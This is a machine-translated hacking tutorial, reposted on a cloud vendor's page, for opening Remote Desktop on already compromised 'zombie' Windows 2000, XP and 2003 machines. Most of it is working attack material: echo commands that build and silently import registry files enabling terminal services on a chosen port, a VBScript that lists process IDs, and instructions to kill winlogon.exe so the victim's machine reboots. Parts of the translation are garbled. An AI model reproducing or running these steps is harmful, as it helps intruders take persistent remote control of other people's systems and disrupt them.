Last article before the 11 th holiday-full guide to enabling zombie 3389 Terminals

Source: Internet
Author: User

The terminal-based method introduced today is green, environmentally friendly, and pollution-free ~~
You do not need to upload any files to enable the terminal. This method is applicable to Win2k, XP, and 2003.

In this article, the premise is that you have obtained an external shell with the system permission of the other Party through some method ~~

Enable the terminal service without uploading any files.

1. Enable the terminal under WIN 2 K

First, use echo to write a 3389. reg file and then import it to the Registry. The echo code is as follows:

Echo Windows Registry Editor Version 5.00> 3389.reg

Echo [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ netcache]> 3389.reg

Echo "enabled" = "0"> 3389.reg

Echo [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon]> 3389.reg

Echo "shutdownwithoutlogon" = "0"> 3389.reg

Echo [HKEY_LOCAL_MACHINE \ SOFTWARE \ Policies \ Microsoft \ Windows \ Installer]> 3389.reg

Echo "enableadmintsremote" = DWORD: 00000001> 3389.reg

Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server]> 3389.reg

Echo "tsenabled" = DWORD: 00000001> 3389.reg

Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ termdd]> 3389.reg

Echo "start" = DWORD: 00000002> 3389.reg

Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ termservice]> 3389.reg

Echo "start" = DWORD: 00000002> 3389.reg

Echo [HKEY_USERS \. Default \ keyboard layout \ toggle]> 3389.reg

Echo "hotkey" = "1"> 3389.reg

Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WDS \ rdpwd \ TDS \ Tcp]> 3389.reg

Echo "portnumber" = DWORD: 00000d3d> 3389.reg

Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ winstations \ RDP-TCP]> 3389.reg

Echo "portnumber" = DWORD: 00000d3d> 3389.reg

Paste the echo code under mongoshell to generate the 3389. reg file, and then Regedit/s 3389. reg to import the registry.

(If you want to change the terminal port, you only need to change the two d3d above)

Because Windows 2 k terminal cannot take effect immediately like XP, it takes effect only after the machine is restarted.

Simply use ntsd.exe (the command above win 2 K) to end an important process and restart the machine !!

For example, if the restart winlogon.exe, lsass.exe can also be used, but the restart countdown will pop out after the end (not good ~)

After winlogon.exe is disabled, the machine is forced to restart immediately.

The Command Execution format is ntsd-C q-p pid.

Which of the following is the PID process Number of winlogon.exe ~

The following script lists the PID of all processes:

Wscript. Echo "PID processname"

For each PS in GetObject ("winmgmts: \. \ Root \ cimv2: win32_process"). Instances _

Wscript. Echo ps. Handle & vbtab & PS. Name

Next

Paste the following echo code in the cmdshell window to obtain the script 1.vbefor viewing the process PID:

Echo wscript. Echo "PID processname"> 1.vbe

Echo for each PS in GetObject ("winmgmts: \. \ Root \ cimv2: win32_process"). Instances _> 1.vbe

Echo wscript. Echo ps. Handle ^ & vbtab ^ & PS. Name> 1.vbe

Echo next> 1.vbe

1. After VBE is generated, check whether the script generated by the ECHO is correct (only four lines are available. Check the above ).

Run 1. VBE to get the following running result:

C: \ winnt \ system32> cscript 1.vbe

Cscript 1.vbe

Microsoft (r) Windows Script Host version 5.1 for Windows

Copyright (c) Microsoft Corporation 1996-1999. All rights reserved.

PID processname

0 system idle Process

8 System

152 smss.exe

180 csrss.exe

200 winlogon.exe

228 services.exe

240 lsass.exe

424 svchost.exe

472 spoolsv.exe

512 msdtc.exe
616 svchost.exe

628 kavsvc. exe

660 llssrv.exe

692 nvsvc32.exe

728 regsvc.exe

748 mstask.exe

776 alter.exe

900 svchost.exe

916 winmgmt.exe

1088 dfssvc.exe

484 EXPLORER. EXE

1444 mdm.exe

1340 server.exe

1224 ibguard.exe

1252 kavsvcui. exe

1256 ibserver.exe

1336 internat.exe

1204 uspds.exe

720 bar.exe

1288 dllhost.exe

1580 inetinfo.exe

1672 cmd.exe

1464 pppoe.exe

1704 regedit.exe

316 cscript.exe

From the beginning, we can see that the PID of winlogon.exe is 200. Run the ntsd-C q-P 200 command (Replace with the pid of the winlogon.exe process ).

Restart (ntsd.exe is the built-in function of win to end any process ~~

Ii. Enable WINXP and win2003 Terminals

The code for enabling the reg file is as follows:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server]

"Fdenytsconnections" = DWORD: 00000000

[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WDS \ rdpwd \ TDS \ Tcp]

"Portnumber" = DWORD: 00000d3d

[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ winstations \ RDP-TCP]

"Portnumber" = DWORD: 00000d3d

Use the following echo code to write a reg file:

Echo Windows Registry Editor Version 5.00> 3389.reg

Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server]> 3389.reg

Echo "fdenytsconnections" = DWORD: 00000000> 3389.reg

Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WDS \ rdpwd \ TDS \ Tcp]> 3389.reg

Echo "portnumber" = DWORD: 00000d3d> 3389.reg

Echo [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ winstations \ RDP-TCP]> 3389.reg

Echo "portnumber" = DWORD: 00000d3d> 3389.reg

Regedit/s 3389.reg

Del 3389.reg

In this way, you do not need to restart the XP and 2003 terminal. If you want to change the port, you only need to change the d3d corresponding to the two portnumbers above to the hexadecimal format of the corresponding decimal number! Use a calculator for conversion. In XP, no restart is required whether to enable the terminal or change the terminal port. This is really amazing ~~ Haha. If you want to disable final close, you only need to set "fdenytsconnections" = DWORD: 00000000

Change to "fdenytsconnections" = DWORD: 00000001.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.